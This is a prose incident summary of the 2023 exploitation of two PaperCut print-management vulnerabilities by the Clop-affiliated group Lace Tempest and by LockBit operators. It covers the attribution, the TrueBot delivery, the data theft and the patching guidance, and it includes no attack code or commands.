Cyber Incident Victim: PaperCut

On or around April 13, 2023, a financially motivated threat actor tracked by Microsoft as Lace Tempest began exploiting two vulnerabilities in PaperCut print management software. These vulnerabilities, identified as CVE-2023-27350 and CVE-2023-27351, had been initially reported to PaperCut by Trend Micro researchers on January 10, 2023. PaperCut, a developer of printing management software for major brands like Canon, Epson, and Xerox, published its first advisory regarding the vulnerabilities on March 8, 2023, and released a fix for the bugs on that date. The software is used by over 70,000 organizations globally, including government agencies, universities, and large corporations.

The exploitation of these vulnerabilities provided remote access to unpatched PaperCut servers on customer networks. The bugs allowed attackers to extract sensitive information stored within a customer’s servers. This information included usernames, full names, email addresses, and payment card numbers associated with user accounts. Microsoft attributed these attacks to the Lace Tempest group, which is known to have overlapping activities with the FIN11 and TA505 threat actors. This group operates as an affiliate for the Clop ransomware operation, carrying out attacks and deploying the ransomware in exchange for a commission from successful extortions.

Microsoft publicly disclosed its attribution of the attacks to Lace Tempest via a series of tweets on April 26, 2023. The company stated it was monitoring these intrusions, which were specifically leading to the deployment of Clop ransomware. The attackers employed a specific technique to deliver their payload. Once they gained access to a vulnerable PaperCut server, they used several PowerShell commands to deliver a malware downloader known as TrueBot. The TrueBot downloader was created by a Russian-speaking hacking group known as Silence, which has been responsible for high-impact attacks on financial institutions in multiple countries.

This method of initial access and deployment was consistent with Lace Tempest's previous tactics. The group has been historically observed using exploits for Fortra’s GoAnywhere file transfer product and the Raspberry Robin worm to deliver ransomware. Both of these techniques are commonly associated with the broader Clop ransomware operation. The ultimate objective of these intrusions was to deploy Clop ransomware onto victim networks, encrypt files, and exfiltrate corporate data to facilitate extortion demands.

The scope of the incident was significant due to the widespread use of PaperCut software. The Cybersecurity and Infrastructure Security Agency (CISA) issued a warning last week, confirming that hackers had successfully exploited these vulnerabilities to gain initial access to customer networks. The incident impacted a wide range of sectors that utilized the vulnerable PaperCut software for managing their print infrastructure. The primary impact was the theft of sensitive corporate data and the subsequent deployment of ransomware, leading to operational disruption and potential financial losses from extortion.

Microsoft noted that the exploitation of these vulnerabilities was not limited to a single threat group. While Lace Tempest was identified as the actor deploying Clop ransomware, Microsoft also stated it was monitoring other attacks exploiting the same PaperCut vulnerabilities. These other intrusions were observed leading to the deployment of Lockbit, another major ransomware operation. This indicated that multiple threat actors had begun to leverage the same vulnerabilities for their own attacks, suggesting the potential for a broader campaign affecting a larger number of organizations.

The response to the incident involved multiple layers of disclosure and public guidance. PaperCut’s initial advisory on March 8 provided the necessary patches to remediate the vulnerabilities. Following the observed exploitation in mid-April, cybersecurity firms and government agencies amplified warnings to ensure organizations applied the available patches. CISA’s warning served as a public alert to all organizations, particularly those in critical infrastructure sectors, to patch their systems immediately to prevent compromise. The public attribution by Microsoft provided valuable threat intelligence to the security community, identifying the specific groups involved and their tools, techniques, and procedures.

The consequences of the incident were data theft and system compromise. The confirmed impact was the exfiltration of user data from victim servers, which included personally identifiable information and financial data in the form of payment card numbers. For organizations where the ransomware was successfully deployed, the consequences also included system-wide encryption of files and significant operational disruption. The incident demonstrated the continued targeting of widely used software appliances for initial access by ransomware affiliates, highlighting the critical importance of prompt patching for internet-facing systems. The use of the PaperCut vulnerabilities by Lace Tempest represented another evolution in the group's methods for gaining initial access to corporate networks to carry out their financially motivated attacks.